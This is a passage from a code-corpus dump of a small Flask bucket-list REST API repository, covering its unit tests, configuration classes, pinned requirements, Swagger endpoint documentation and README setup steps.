test_get_activity_limit(self):\n '''A method to test the limit variable on happy path'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n second_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n third_activity = {\"activity_name\": \"Climb the Alps\"}\n fourth_activity = {\"activity_name\": \"Climb Mt. Everest\"}\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=second_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=third_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n post_activity_data_2 = self.client().post('/bucketlists/1/items/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=fourth_activity)\n self.assertEqual(post_activity_data_2.status_code, 201)\n result_of_get_activity = self.client().get('bucketlists/1/items/?limit=2',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_activity.data))\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_get_activity.data))\n self.assertNotIn('Climb the Alps', str(result_of_get_activity.data))\n self.assertNotIn('Climb Mt. Everest', str(result_of_get_activity.data))\n result_of_get_activity_1 = self.client().get('bucketlists/1/items/?limit=0',\n headers=dict(Authorization='Bearer '\n + self.token()\n )\n )\n self.assertEqual(result_of_get_activity_1.status_code, 200)\n self.assertNotIn('Climb the Himalayas', str(result_of_get_activity_1.data))\n self.assertNotIn('Climb Mt. Kilimanjaro', str(result_of_get_activity_1.data))\n self.assertNotIn('Climb the Alps', str(result_of_get_activity_1.data))\n self.assertNotIn('Climb Mt. Everest', str(result_of_get_activity_1.data))\n self.assertIn('Zero returns no item', str(result_of_get_activity_1.data))\n\n def test_updating_an_activity(self):\n '''A method to test updating an activity happy path with correct\n details\n '''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n update_activity = {\"activity_name\": \"Climb Mt. Kilimanjaro\"}\n result_of_put = self.client().put('/bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data=update_activity\n )\n self.assertEqual(result_of_put.status_code, 200)\n self.assertIn('Climb Mt. Kilimanjaro', str(result_of_put.data))\n\n def test_update_similar_activity(self):\n '''Test that an activity is not updated if it already exists'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n update_activity = {\"activity_name\": \"Climb the Himalayas\"}\n result_of_put = self.client().put('/bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data=update_activity\n )\n self.assertEqual(result_of_put.status_code, 409)\n\n def test_deleting_an_activity(self):\n '''A method to test that deleting an activity works in happy path'''\n post_activity_data = self.post_an_activity()\n self.assertEqual(post_activity_data.status_code, 201)\n result_of_delete_activity = self.client().delete('bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_delete_activity.status_code, 200)\n result_of_delete_activity_2 = self.client().delete('bucketlists/1/items/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_delete_activity_2.status_code, 400)\n\n def tearDown(self):\n '''A method for removing all set variables and deleting our database'''\n with self.app.app_context():\n db.session.remove()\n db.drop_all()\n"
},
{
"alpha_fraction": 0.7217234969139099,
"alphanum_fraction": 0.7217234969139099,
"avg_line_length": 24.9069766998291,
"blob_id": "50516136d726a869052bb264aac0e5edd0c544b6",
"content_id": "b1588c1d0211e867c865dbea34ac27f644eea517",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1114,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 43,
"path": "/instance/config.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module for setting the configuration setting for when the app is on different\nmodes'''\nimport os\n\n\nclass Configurations(object):\n '''Parent class for configurations under config.py module'''\n DEBUG=False\n CSRF_ENABLED=True\n SECRET = os.getenv('SECRET')\n SQLALCHEMY_DATABASE_URI = os.getenv('DATABASE_URL')\n\n\nclass UnderProduction(Configurations):\n '''Configurations for whent the mode is under production'''\n DEBUG=False\n TESTING=False\n\n\nclass UnderStaging(Configurations):\n '''Configurations for when the mode is staging'''\n DEBUG=True\n\n\nclass UnderTesting(Configurations):\n '''Configurations for when the mode is under testing, whereby a separate test\n database will be used under this mode'''\n TESTING=True\n SQL_ALCHEMY_DATABASE_URI = os.getenv('postgresql://localhost/test_db')\n DEBUG=True\n\n\nclass UnderDevelopment(Configurations):\n '''Configuration for when the mode is development'''\n DEBUG=True\n\n\napp_configurations = {\n 'production': UnderProduction,\n 'staging': UnderStaging,\n 'testing': UnderTesting,\n 'development': UnderDevelopment\n}\n"
},
{
"alpha_fraction": 0.48242810368537903,
"alphanum_fraction": 0.6821086406707764,
"avg_line_length": 15.051281929016113,
"blob_id": "4fbbf41460f54e4f564304ec28765dfc9f5a12b5",
"content_id": "8fd136986475866c9001a1950d26f4efc5e4803e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 626,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 39,
"path": "/requirements.txt",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "alembic==0.9.5\nastroid==1.5.3\nautoenv==1.0.0\nbcrypt==3.1.3\ncffi==1.10.0\nclick==6.7\ncolorama==0.3.9\ncoverage==4.4.1\nflasgger==0.6.6\nFlask==0.12.2\nFlask-API==0.7.1\nFlask-Bcrypt==0.7.1\nFlask-Cors==3.0.3\nFlask-Migrate==2.1.0\nFlask-Script==2.0.5\nFlask-SQLAlchemy==2.2\nisort==4.2.15\nitsdangerous==0.24\nJinja2==2.9.6\njsonschema==2.6.0\nlazy-object-proxy==1.3.1\nMako==1.0.7\nMarkupSafe==1.0\nmccabe==0.6.1\nmistune==0.7.4\nnose==1.3.7\npsycopg2==2.7.3\npy==1.4.34\npycparser==2.18\nPyJWT==1.5.2\npylint==1.7.2\npytest==3.2.1\npython-dateutil==2.6.1\npython-editor==1.0.3\nPyYAML==3.12\nsix==1.10.0\nSQLAlchemy==1.1.13\nWerkzeug==0.12.2\nwrapt==1.10.11\n"
},
{
"alpha_fraction": 0.6261290311813354,
"alphanum_fraction": 0.6358841061592102,
"avg_line_length": 30.740825653076172,
"blob_id": "4b05a885e779f9e63a18df2512c1780e66866900",
"content_id": "be4b9d1cce506ecc59233db5f06192d3c5a52302",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13839,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 436,
"path": "/swagger_documentation.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module that contains documentation for swagger implementation\nwhich maps to the files for the flask api\n'''\nimport os\nfrom flasgger import Swagger\n\nfrom app import create_app\n\nCONFIG_NAME = os.getenv('APP_SETTINGS')\napp = create_app(CONFIG_NAME)\nSWAGGER = Swagger(app)\n\[email protected]('/auth/register', methods=['POST'])\ndef register_user():\n \"\"\"Endpoint creating a user\n To register insert a valid email address such as '[email protected]' or '[email protected]'\n Insert a password for the email that you insert. The password can be a string.\n ---\n parameters:\n - name: user_email\n in: formData\n type: string\n description: A valid email for a user\n required: true\n - name: user_password\n in: formData\n type: string\n description: password for the user\n required: true\n responses:\n 201:\n description: User has been created\n 401:\n description: User creation has been unauthorised by the server\n 409:\n description: An identical user with the same email address already exists.\n 400:\n description: Key variables used or the values entered are not suitable. Bad request.\n \"\"\"\n pass\n\[email protected]('/auth/login', methods=['POST'])\ndef login_user():\n \"\"\"Endpoint logging in a user\n To login ensure that you have an account that is registered. Insert a valid email address\n on the key variable user_email and the password registered it with.\n ---\n parameters:\n - name: user_email\n in: formData\n type: string\n description: A valid email for a user\n required: true\n - name: user_password\n in: formData\n type: string\n description: password for the user\n required: true\n responses:\n 400:\n description: Key variables to be entered are supposed\n to be user_email and user_password. The email has to be valid.\n 401:\n description: User has been unauthorised.\n 200:\n description: User has been logged in.\n \"\"\"\n pass\n\[email protected]('/auth/reset-password', methods=['POST'])\ndef reset_password():\n \"\"\"Endpoint reseting password for a user\n Insert the current password that you use for your account on the user_password key.\n Insert a new password for your account on the new_password key.\n Verify that you inserted it right by inserting it on the verify_new_password key.\n ---\n parameters:\n - name: user_password\n in: formData\n type: string\n description: Current password for the user\n required: true\n - name: new_password\n in: formData\n type: string\n description: New password for the user\n required: true\n - name: verify_new_password\n in: formData\n type: string\n description: Password verifier for the user\n required: true\n responses:\n 401:\n description: Unauthorised.\n 400:\n description: The request made has an error witht the data given.\n 201:\n description: New password generated.\n \"\"\"\n pass\n\[email protected]('/auth/logout', methods=['POST'])\ndef logout_user():\n \"\"\"Endpoint logging out a user\n Log out the user by pressing the button\n ---\n responses:\n 200:\n description: User logged out\n \"\"\"\n pass\n\[email protected]('/bucketlists/', methods=['POST'])\ndef post_bucketlist():\n \"\"\"Endpoint for posting a bucketlist\n On the variable name insert a name for the bucket list\n ---\n parameters:\n - name: name\n in: formData\n type: string\n description: A bucket name that does not exist in the bucketlist\n required: true\n - name: Authorization\n description: Token that should begin with the word Beare and a space 'Bearer '\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Unauthorised\n 400:\n description: No bucket name entered\n 201:\n description: Bucket name created\n 409:\n description: The bucket name entered already exists in the bucketlist\n \"\"\"\n pass\n\[email protected]('/bucketlists/')\ndef get_bucketlist():\n \"\"\"Endpoint for getting a bucketlist\n A route that returns all the bucketlists for the user if no arguments are provided.\n Authorization refers to the clients token for authorising a user.\n Q asks for a string on th bucket name to enter.\n Limit asks for an integer to limit the number of buckets to return\n ---\n parameters:\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after to\n separate the two statements 'Bearer '\n in: header\n type: string\n required: true\n - name: q\n description: A query for asking for the string for searching\n in: query\n type: string\n - name: limit\n description: A limit for returning the number of buckets inserted\n in: query\n type: integer\n responses:\n 200:\n description: Request passed\n 400:\n description: Wrong value entered on the limit or bad route\n 401:\n description: User unauthorized\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:id>', methods=['GET'])\ndef manipulate_bucketlist():\n \"\"\"Endpoint for getting a specific bucket using its id\n Insert integer for the id to get the bucket list using its bucket id.\n Authorization refers to the client's token for authorising a user.\n ---\n parameters:\n - name: id\n in: path\n type: integer\n required: true\n description: The bucket list id\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after\n to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User unauthorized due to wrong id for the bucket list\n 400:\n description: The id does not represent an id for a bucket in the bucketlist\n 200:\n description: The bucket item with the bucket id above has been returned\n \"\"\"\n pass\n\[email protected]('/bucketlists/<id>', methods=['PUT'])\ndef update_bucketlist():\n \"\"\"Endpoint for updating a bucketlist\n The route updates a bucket using the id of the bucket to determine the exact\n bucket and a name to replace the original name of the bucket\n ---\n parameters:\n - name: id\n in: path\n type: integer\n required: true\n description: An id for the bucket.\n - name: name\n in: formData\n type: string\n description: A bucket name that does not already exist in the user's bucketlist.\n required: true\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after to\n separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User has not been authorized majorly due to wrong token supplied\n 400:\n description: Bad request due to wrong id or no name granted for the bucket\n 201:\n description: Bucket replaced and new bucket created\n 409:\n description: A similar bucket with the same name was created before\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:id>', methods=['DELETE'])\ndef delete_bucketlist():\n \"\"\"Endpoint for deleting a bucketlist\n The route deletes a bucket using the id supplied by the user\n ---\n parameters:\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after to\n separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n - name: id\n in: path\n type: integer\n required: true\n description: An id for the bucket.\n responses:\n 401:\n description: User has not been authorized majorly due to wrong token supplied\n 400:\n description: Bad request due to wrong id granted for the bucket\n 200:\n description: Bucket has been deleted\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/', methods=['POST'])\ndef post_activities():\n \"\"\"Endpoint for deleting an activity\n Post an activity on a particular bucket by using the bucket id\n ---\n parameters:\n - name: activity_name\n in: formData\n type: string\n description: An activity within the bucketlist, that does not exist in the\n specific bucketlist\n required: true\n - name: bucket_id\n in: path\n type: integer\n description: The id for the bucket\n required: true\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after\n to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User has not been authorized majorly due to wrong token supplied\n 400:\n description: Bad request due to id or no activity name supplied\n 201:\n description: New activity name created\n 409:\n description: Activity not created because it already exists in this users\n bucket list as it was created before\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/', methods=['GET'])\ndef get_activities():\n \"\"\"Endpoint for getting activities\n A method for returning activities, by supplying an id for a specific bucket\n ---\n parameters:\n - name: bucket_id\n in: path\n type: integer\n description: The id for the bucket\n required: true\n - name: Authorization\n description: Token that should begin with the word Bearer and a space\n after to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Users unauthorized\n 400:\n description: Bad reqeust possibly because wrong id supplied for the\n bucket list, no data given for search parameter\n 200:\n description: Request acted on\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods=['GET'])\ndef manipulate_activity():\n \"\"\"Endpoint for retrieving a particular activity\n A route for returning a specific activity using its bucket_id and activity_id\n ---\n parameters:\n - name: activity_id\n in: path\n required: true\n description: An id for an activity the user wants to retrieve\n type: integer\n - name: bucket_id\n in: path\n required: true\n description: An id for a bucket a user wants to retrieve an activity from\n type: integer\n - name: Authorization\n description: Token that should begin with the word Bearer and a space\n after to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Unauthorized\n 400:\n description: Bad request, bucket id does not exist for this user,\n activity id does not exist for this user\n 200:\n description: Activity returned successfully\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods=['PUT'])\ndef update_activity():\n \"\"\"Endpoint for updating an activity\n A method for updating an activity by replacing the name of the activity\n ---\n parameters:\n - name: activity_name\n in: formData\n type: string\n description: An activity within the bucketlist, that does not exist in the\n specific bucketlist\n required: true\n - name: activity_id\n in: path\n required: true\n description: An id for an activity the user wants to retrieve\n type: integer\n - name: bucket_id\n in: path\n required: true\n description: An id for a bucket a user wants to retrieve an activity from\n type: integer\n - name: Authorization\n description: Token that should begin with the word Bearer and a space after\n to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: User unauthorized\n 400:\n description: Bad request the bucket does not exist or the activity does not\n exist from the respective ids given by the user\n 409:\n description: Activity name had been entered before posing conflict with new\n activity name inserted\n 200:\n description: Activity updated\n \"\"\"\n pass\n\[email protected]('/bucketlists/<int:bucket_id>/items/<int:activity_id>', methods=['DELETE'])\ndef delete_activity():\n \"\"\"Endpoint for deleting an activity\n A method for deleting an activity using the bucket and activity id\n ---\n parameters:\n - name: activity_id\n in: path\n required: true\n description: An id for an activity the user wants to retrieve\n type: integer\n - name: bucket_id\n in: path\n required: true\n description: An id for a bucket a user wants to retrieve an activity from\n type: integer\n - name: Authorization\n description: Token that should begin with the word Bearer and a space\n after to separate the two statements 'Bearer token'\n in: header\n type: string\n required: true\n responses:\n 401:\n description: Unauthorized\n 400:\n description: Bad request the bucket id and activity id does not exist\n 200:\n description: Activity id deleted\n \"\"\"\n pass\n\napp.run(debug=True)\n"
},
{
"alpha_fraction": 0.6411007046699524,
"alphanum_fraction": 0.6413934230804443,
"avg_line_length": 65.98039245605469,
"blob_id": "0961fdc38b6bfd914dd99c10bf436fd4469c750c",
"content_id": "0d005c23bb222a9acee1f5766f83fa075603cfcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3416,
"license_type": "no_license",
"max_line_length": 423,
"num_lines": 51,
"path": "/README.md",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.org/WinstonKamau/FLASK_API)\n\n[](https://coveralls.io/github/WinstonKamau/FLASK_API?branch=master)\n# FLASK_API\nFlask Api is a restful api that serves clients by allowing them to create, read, update and delete buckets as well as activities within their buckets. By buckets we refer to a larger class category of things clients would love to do in their lives before they die for example 'Travelling'. By activities/items we refer to a more detail explanation of the bucket, search as 'Travel to Morrocco and visit the formula E arena'\n\n# Features\n- The flask api allows users to register using a user email and a user password\n- The flask api allows users to login using their respective email an passwords\n- The flask api allows users to reset passwords.\n- The flask api allows users to log out, the logout function simply deletes tokens on the client server but this has not yet been implemented\n- The flask api allows users to create, retrieve and manipulate buckets\n- The flask api allows a user to create, retrieve and manipulate activities\n\n#Technologies used\n- Python3\n- Flask\n- Postgresql\n# Setup\n-Create a folder that will host the project\n-Clone https://github.com/WinstonKamau/FLASK_API.git\n-Ensure that you are working in a virtual environment. `pip install virtualenv`>\n-Create a .env file\n-On your .env file set you database url to link to your postgresql account.\n `export DATABASE_URL=\"postgresql://localhost/flask_api\"` if you have a password ensure that the link above delivers the username and password. e.g. `export DATABASE_URL=\"postgresql://username:password@localhost/flask_api\"`\n-On the .env file set `export FLASK_APP to run.py`\n-On the .env file set `export SECRET=\"any string you choose\"`\n-On the .env file set `export APP_SETTINGS=\"development`\n-Install the requirements on the requirements.txt file `pip install -r requirements.txt`\n-Create a migrations folder by running `python migrate db init`\n-Migrate the migrations by running `python migrate db migrate`\n-Run `python migrate db upgrade` to persist migrations\n-To run the app on flassger use `python swagger_documentations.py`\n-To run the app on postman user `flask run`\n-Run the app using `python run.py `\n\n# API ENDPOINTS\n| **REQUEST** | **ENDPOINT** | **Public Access** |\n| ----------- | ----------------------------------| ----------------- |\n| POST | /auth/register | True |\n| POST | /auth/login | True |\n| POST | /auth/reset-password | True |\n| POST | /auth/logout | True |\n| POST | /bucketlists/ | False | \n| GET | /bucketlists/ | False |\n|GET | /bucketlists/<id> | False |\n| PUT | /bucketlists/<id> | False |\n| DELETE | /bucketlists/<id> | False |\n| POST | /bucketlsits/<id>/items/ | False |\n| PUT | /bucketlists/<id>/items/<item_id> | False |\n| DELETE | /bucketlists/<id>/items/<item_id> | False |\n"
},
{
"alpha_fraction": 0.46435871720314026,
"alphanum_fraction": 0.47425907850265503,
"avg_line_length": 52.9862060546875,
"blob_id": "7c26065d5a690772875e71a969e085e41a99e413",
"content_id": "92bcc431225c4c41ea4ce80d788df8ae24ac4e01",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15656,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 290,
"path": "/tests/test_bucketlist.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "'''A module to test the Bucket List class on crud for bucketlists '''\nimport unittest\nimport json\nfrom app import create_app, db\n\nclass TheBucketTestCase(unittest.TestCase):\n '''A class to test the functionalities of creating reading updating and deleting a\n bucketlist'''\n\n def setUp(self):\n '''Initialising the app and variables for testing'''\n self.app = create_app(config_name=\"testing\")\n self.client = self.app.test_client\n self.bucketlist = {\"name\": \"Climb the Himalayas\"}\n self.user_information = {\n \"user_email\": \"[email protected]\",\n \"user_password\": \"password\"\n }\n with self.app.app_context():\n db.create_all()\n\n def token(self):\n '''A method that registers a user, logs in a user, creates a token\n for the user and returns it'''\n self.client().post('/auth/register', data=self.user_information)\n result_of_login = self.client().post('/auth/login', data=self.user_information)\n token = json.loads(result_of_login.data.decode())['access-token']\n return token\n\n def post_a_bucket(self):\n '''A method that posts a bucket to the test_db, ideally all other\n methods use it so it acts as a method for posting for tests below.\n The method posts after registering and logging in\n '''\n return self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=self.bucketlist\n )\n\n def test_bucketlist_creation(self):\n \"\"\"A method to test that the API creates a bucket\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n self.assertIn('Climb the Himalayas', str(post_data.data))\n\n def test_wrong_keys_provided(self):\n '''Posting a path with wrong key and no key name provided'''\n wrong_key = {'wrong_key': 'Travel'}\n result_of_wrong_key = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data=wrong_key\n )\n self.assertEqual(result_of_wrong_key.status_code, 400)\n self.assertIn('The key variable name', str(result_of_wrong_key.data))\n result_of_wrong_key_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()\n ))\n self.assertEqual(result_of_wrong_key_2.status_code, 400)\n\n def test_if_bucket_already_exists(self):\n '''A method to test that creation does not happen if the bucket\n already exists\n '''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_second_time = self.post_a_bucket()\n self.assertEqual(post_data_second_time.status_code, 409)\n self.assertIn('A bucket list exists with a similar name of',\n str(post_data_second_time.data))\n\n def test_read_bucket(self):\n \"\"\"A method to test that the api reads a bucket\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Climb the Himalayas', str(result_of_get_method.data))\n\n\n def test_read_bucket_using_id(self):\n '''A method to test the retrieval of one bucket using an id placed in brackets\n on the after the '/bucketlists/' statement below\n '''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n #converting the response from posting to json format\n json_data = json.loads(post_data.data.decode('utf-8').replace(\"'\", \"\\\"\"))\n final_data = self.client().get('/bucketlists/{}'.format(json_data['id']),\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(final_data.status_code, 200)\n self.assertIn('Climb the Himalayas', str(final_data.data))\n\n def test_read_bucket_using_q(self):\n '''Test read bucket using q with bucket existing'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n result_of_get_method = self.client().get(\"/bucketlists/?q=Climb the Himalayas\",\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn(\"Climb the Himalayas\", str(result_of_get_method.data))\n self.assertNotIn('Family', str(result_of_get_method.data))\n\n def test_q_no_item(self):\n '''A method to test reading a bucket using q where the bucket does not\n exist\n '''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_get_method = self.client().get(\"/bucketlists/?q=aisdo\",\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Name does not exist', str(result_of_get_method.data))\n\n def test_read_bucket_using_limit(self):\n '''A method to test reading a bucket using correct inputs'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n post_data_3 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Travel\"})\n self.assertEqual(post_data_3.status_code, 201)\n post_data_4 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Adventure\"})\n self.assertEqual(post_data_4.status_code, 201)\n post_data_5 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Acts of Kindness\"})\n self.assertEqual(post_data_5.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/?limit=3',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Family', str(result_of_get_method.data))\n self.assertIn('Travel', str(result_of_get_method.data))\n self.assertIn('Climb the Himalayas', str(result_of_get_method.data))\n self.assertNotIn('Adventure', str(result_of_get_method.data))\n self.assertNotIn('Acts of Kindness', str(result_of_get_method.data))\n\n def test_limit_zero(self):\n '''Test reading bucket using a limit for zero'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n post_data_3 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Travel\"})\n self.assertEqual(post_data_3.status_code, 201)\n post_data_4 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Adventure\"})\n self.assertEqual(post_data_4.status_code, 201)\n post_data_5 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Acts of Kindness\"})\n self.assertEqual(post_data_5.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/?limit=0',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Zero returns no buckets', str(result_of_get_method.data))\n\n def test_over_limit(self):\n '''A method to test reading bucket by inserting a limit that is\n over the values in it'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n post_data_2 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Family\"})\n self.assertEqual(post_data_2.status_code, 201)\n post_data_3 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Travel\"})\n self.assertEqual(post_data_3.status_code, 201)\n post_data_4 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Adventure\"})\n self.assertEqual(post_data_4.status_code, 201)\n post_data_5 = self.client().post('/bucketlists/',\n headers=dict(Authorization='Bearer '\n + self.token()),\n data={\"name\": \"Acts of Kindness\"})\n self.assertEqual(post_data_5.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/?limit=7',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_get_method.status_code, 200)\n self.assertIn('Family', str(result_of_get_method.data))\n self.assertIn('Travel', str(result_of_get_method.data))\n self.assertIn('Climb the Himalayas', str(result_of_get_method.data))\n self.assertIn('Adventure', str(result_of_get_method.data))\n self.assertIn('Acts of Kindness', str(result_of_get_method.data))\n\n def test_edit_bucketlist(self):\n \"\"\"A method to test the editing of a bucket list\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_put_method = self.client().put(\n '/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data={\n \"name\": \"The seasons will be, summer winter and autumn\"\n })\n self.assertEqual(result_of_put_method.status_code, 201)\n result_of_get_method = self.client().get('/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertIn('The seasons will b', str(result_of_get_method.data))\n\n def test_edit_bucketlist_sad_path_1(self):\n '''Test edit bucket using a name already stored'''\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_put_method = self.client().put(\n '/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token()\n ),\n data={\n \"name\": \"Climb the Himalayas\"\n })\n self.assertEqual(result_of_put_method.status_code, 409)\n\n def test_delete_bucketlist(self):\n \"\"\"A method to test the deleting of a bucket list\"\"\"\n post_data = self.post_a_bucket()\n self.assertEqual(post_data.status_code, 201)\n result_of_delete_method = self.client().delete('/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(result_of_delete_method.status_code, 200)\n response_after_removal = self.client().get('/bucketlists/1',\n headers=dict(Authorization='Bearer '\n + self.token())\n )\n self.assertEqual(response_after_removal.status_code, 400)\n\n def tearDown(self):\n '''A method for removing all set variables and deleting our database'''\n with self.app.app_context():\n db.session.remove()\n db.drop_all()\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.7709923386573792,
"alphanum_fraction": 0.7709923386573792,
"avg_line_length": 25.399999618530273,
"blob_id": "6479a3d46bfed34e563cb11f1097be87fceb62b8",
"content_id": "0537ed64aae4f92a038d207b0f6276f4f1bdd685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/app/extensions/__init__.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "from flask import Blueprint\n\nregistration_login_blueprint = Blueprint('auth', __name__)\n\nfrom . import views_for_register_and_login"
},
{
"alpha_fraction": 0.5818543434143066,
"alphanum_fraction": 0.5892375111579895,
"avg_line_length": 45.03268051147461,
"blob_id": "7913767b2a1aea595f934b615987f582e1911969",
"content_id": "2ed253b6521de3336bff0c90885bbd24de88dcb0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7043,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 153,
"path": "/tests/test_registration_login_token.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
